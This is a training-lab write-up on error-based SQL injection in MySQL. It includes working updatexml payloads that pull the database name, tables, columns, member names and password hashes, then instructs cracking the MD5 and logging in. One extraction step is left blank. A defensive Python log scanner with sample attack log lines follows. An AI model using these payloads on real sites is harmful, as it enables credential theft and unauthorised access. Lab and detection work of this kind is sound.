Lab URL:
https://www.mozhe.cn/bug/detail/Ri9CaDcwWVl3Wi81bDh3Ulp0bGhOUT09bW96aGUmozhe
Determine the parameter type:
Test: id=1' - the page shows an error.
id=1# - the page displays normally. I first took that to mean a numeric parameter, but that was misleading: the lab filters the # character, so keep testing.
id=1'%23 - the page displays normally, which confirms the parameter is a string type.
Get the database name from the error message:
1' and (updatexml(1,concat(0x7e,(select database()),0x7e),1))%23

Get the table names from the error message:
1' and (updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1))%23

Get the column names from the error message:
1' and (updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='member'),0x7e),1))%23

Get the name values where status is 1:
1' and (updatexml(1,concat(0x7e,(select group_concat(name) from member where status=1),0x7e),1))%23

Get the password values where status is 1
Since the error message echoes only a limited number of characters, use substr to slice the string.
Positions 1 to 20:
1' and (updatexml(1,concat(0x7e,substr((select group_concat(password) from member where status=1),1,20),0x7e),1))%23

Positions 21 to 40:

Crack the MD5 hash of the password and log in.
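As an added example from the defender's side (not part of the write-up), a small Python log scanner: it URL-decodes each query parameter before matching, so the %23 form of the comment terminator seen above is caught just like a literal #, and it flags the unbalanced quote, the comment terminator and the updatexml()/extractvalue() call that characterise this error-based technique. The log lines and the /item.php path are constructed sample data.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed Apache-style access-log lines (sample data); /item.php is a placeholder path.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /item.php?id=1 HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /item.php?id=1%27 HTTP/1.1" 500 233
10.0.0.5 - - [01/Jan/2024:10:00:03 +0000] "GET /item.php?id=1%27%23 HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2024:10:00:04 +0000] "GET /item.php?id=1%27%20and%20(updatexml(1,concat(0x7e,(select%20database()),0x7e),1))%23 HTTP/1.1" 200 601
"""

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')
# XML functions whose MySQL error message echoes their (attacker-controlled) argument.
ERROR_FUNC_RE = re.compile(r"\b(updatexml|extractvalue)\s*\(", re.I)
# MySQL comment openers used to discard the remainder of the original query.
COMMENT_RE = re.compile(r"#|--\s|/\*")


def fully_decode(value, max_rounds=3):
    # Decode until stable so %23 (#) and double-encoded forms like %2527 (') are seen as-is.
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def analyze_param(value):
    # Return the suspicious traits found in one decoded parameter value.
    reasons = []
    if value.count("'") % 2 == 1:
        reasons.append("unbalanced_quote")
    if COMMENT_RE.search(value):
        reasons.append("comment_terminator")
    if ERROR_FUNC_RE.search(value):
        reasons.append("error_based_function")
    return reasons


def scan_log(text):
    # Flag requests whose query parameters carry error-based SQL injection traits.
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        m = REQUEST_RE.search(line)
        if not m: continue
        query = urlsplit(m.group(1)).query  # a raw # would be a fragment; %23 stays in the query
        for name, raw in parse_qsl(query, keep_blank_values=True):
            reasons = analyze_param(fully_decode(raw))  # parse_qsl decoded once; catch double encoding
            if reasons:
                findings.append({"line": lineno, "param": name, "reasons": reasons})
    return findings
```

Running scan_log(SAMPLE_LOG) reports lines 2 to 4 with increasingly specific reasons, mirroring the probing sequence in the write-up; a 500 on line 2 followed by 200s with a comment terminator is the pattern worth alerting on.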